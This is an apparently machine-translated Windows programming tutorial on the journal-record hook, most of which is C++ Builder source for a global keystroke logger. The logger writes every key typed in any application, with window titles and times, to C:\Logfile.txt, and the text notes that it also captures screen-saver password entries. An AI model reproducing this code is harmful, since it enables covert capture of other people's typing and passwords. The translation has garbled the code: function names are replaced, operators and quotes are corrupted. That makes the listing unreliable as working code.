Use of journalrecord hook

-- Hooks are an important part of the message processing mechanism in windows. By installing various hooks and applications Program You can set corresponding child routines to monitor the message passing in the system and process the messages before they reach the target window program. There are many types of hooks. Each Hook can intercept and process corresponding messages. For example, a keyboard Hook can intercept keyboard messages, and a mouse Hook can intercept mouse messages, shell hooks can intercept messages that start and stop applications, and log hooks can monitor and record input events. Hooks are classified into dedicated hooks and global hooks. Dedicated hooks only monitor specified threads. To monitor all threads in the system, global hooks must be used. For global hooks, the hook function must be included in an independent dynamic link library (DLL) to be called by various associated applications. In Windows, the Log Hook is a very special hook. It only has one global hook, which occurs when messages from input devices such as keyboard and mouse are taken out of the system message queue, in addition, the system can only have one such Log Hook. More importantly, it does not need to be used in the dynamic link library, which saves the trouble of creating a dynamic link library for installing a global hook. Using Log hooks, we can monitor various input events. The following example can be used to record keyboard input. When there is a button, automatically record the date and time of the button action and the name of the currently activated window. This example is compiled in WIN98 and Borland C ++ builder4.

---- 1. Create a project and place two buttons button1 and button2 in form form1. caption is "Install Log Hook" and "Uninstall Log Hook" respectively ".

---- 2. Define the following global variables:

Hhook g_hloghook = NULL; // hook variable hwnd g_hlastfocus = NULL; // record the window handle for the last focus. Const int keypressmask = 0x80000000; // The constant char g_prvchar In the keyboard mask; // save the last key value 3. in The onclick event of button1, enter: void _ fastcall tform1: button1click (tobject * sender) {If (g_hloghook = NULL) g_hloghook = callback (callback, (hookproc) journallogproc, hinstance, 0); // Installation Log Hook} 4. in The onclick event of button2, enter: void _ fastcall tform1: button2click (TOB Ject * sender) {If (g_hloghook! = NULL) {unhookwindowshookex (g_hloghook); g_hloghook = NULL;} // uninstall Log Hook} 5. input hook callback function: hookproc journallogproc (INT icode, wparam, lparam) {If (icode <0) Return (hookproc) callback (g_hloghook, icode, wparam, lparam ); if (icode = "= hc_action)" {eventmsg * pevt = "(eventmsg" *) lparam; int I; hwnd hfocus; // Save the current active window handle char sztitle [256]; // the current window name char sztime [128]; // Save the current date and time file * stream = "fopen (" C: \ Logfile.txt "," A + T ");" If (pevt-> message = wm_keydown) {int vkey = lobyte (pevt-> paraml ); // obtain the virtual key value char ch; char STR [10]; hfocus = getactivewindow (); // obtain the current active window handle if (g_hlastfocus! = Hfocus) // whether the current active window changes {getwindowtext (hfocus, sztitle, 256); g_hlastfocus = hfocus; strcpy (sztime, datetimetostr (now ()). c_str (); // get the current date and time fprintf (stream, "% C % S % C % s", 10, sztime, 32, 32, sztitle ); // write the file fprintf (stream, "% C", 32, 32);} int ishift = getkeystate (0x10); // test shift, caption, numlock and other keys whether to press int icapital = getkeystate (0x14); int inumlock = getkeystate (0x90); bool bshift = (ishift & keypressmask) = keypressm Ask; bool bcapital = (icaploud & 1) = 1; bool bnumlock = (inumlock & 1) = 1; if (vkey> = 48 & vkey <= 57) // number 0-9 If (! Bshift) fprintf (stream, "% C", vkey); If (vkey >=65 & vkey <= 90) // A-Z A-z {If (! Bcapital) if (bshift) CH = "vkey;" else CH = "vkey + 32;" else if (bshift) CH = "vkey + 32;" else CH = "vkey; "fprintf (stream," % C ", CH);} If (vkey >=96 & vkey <= 105) // keypad 0-9 If (bnumlock) fprintf (stream, "% C", vKey-96 + 48); If (vkey> = 186 & vkey <= 222) // other keys {Switch (vkey) {Case 186: if (! Bshift) CH = ";"; else CH = ":"; break; Case 187: If (! Bshift) CH = "="; else CH = "+"; break; Case 188: If (! Bshift) CH = ","; else CH = "<"; break; Case 189: If (! Bshift) CH = "-"; else CH = "_"; break; Case 190: If (! Bshift) CH = "."; else CH = ">"; break; Case 191: If (! Bshift) CH = "/"; else CH = "? "; Break; Case 192: If (! Bshift) CH = "'"; else CH = "~ "; Break; Case 219: If (! Bshift) CH = "["; else CH = "{"; break; Case 220: If (! Bshift) CH = "\"; else CH = "|"; break; Case 221: If (! Bshift) CH = "]"; else CH = "}"; break; Case 222: If (! Bshift) CH = "\" '; else CH = "\" "; break; default: CH =" N "; break;} If (Ch! = "N") fprintf (stream, "% C", CH);} // If (wparam> = 112 & wparam <= 123) // function key [F1]-[F12] If (vkey> = 8 & vkey <= 46) // direction key {Switch (vkey) {Case 8: strcpy (STR, "[BK]"); break; Case 9: strcpy (STR, "[Tab]"); break; Case 13: strcpy (STR, "[En]"); break; Case 32: strcpy (STR, "[Sp]"); break; Case 33: strcpy (STR, "[PU]"); break; Case 34: strcpy (STR, "[Pd]"); break; Case 35: strcpy (STR, "[end]"); break; Case 36: strcpy (STR, "[home]"); Break; Case 37: strcpy (STR, "[LF]"); break; Case 38: strcpy (STR, "[UF]"); break; Case 39: strcpy (STR, "[RF]"); break; Case 40: strcpy (STR, "[DF]"); break; Case 45: strcpy (STR, "[ins]"); break; Case 46: strcpy (STR, "[del]"); break; default: CH = "N"; break;} If (Ch! = "N") {If (g_prvchar! = "Vkey)" {fprintf (stream, "% s", STR); g_prvchar = "vkey; "}}} if (pevt-> message = wm_lbuttondown | pevt-> message = wm_rbuttondown) {hfocus = getactivewindow (); If (g_hlastfocus! = Hfocus) {g_hlastfocus = hfocus; getwindowtext (hfocus, sztitle, 256); strcpy (sztime, datetimetostr (now ()). c_str (); // get the current date and time fprintf (stream, "% C % S % C % s", 10, sztime, 32, 32, sztitle ); // write the file fprintf (stream, "% C", 32, 32) ;}} fclose (Stream); Return (hookproc) callnexthookex (g_hloghook, icode, wparam, lparam );}

---- After the project is compiled and executed, every time a window is activated, the current window name will be written to the file c: \ logfile.txt. When there is a button, the key name is also written into this file, and not all buttons are processed here. You can add corresponding statements as needed. To capture the keyboard's key actions, you can also use a keyboard hook, but it is much easier to use a Log Hook than a keyboard hook. First, if you want to capture the buttons of other applications, that is, to create a global Hook, the keyboard hook must be placed in the dynamic link library separately, but the Log Hook does not need to be; second, the system has processed the input before the keyboard buttons obtained by the keyboard hook function. If the system shields these keys, the keyboard hook cannot detect them. For example, when the screen saver password is entered, the keyboard hook cannot detect the characters entered by the user, but the Log Hook can detect the characters.

---- Whatever the hooks, the system will increase the time for processing messages, thus reducing system performance. We only install these hooks when necessary, and try to remove them whenever possible.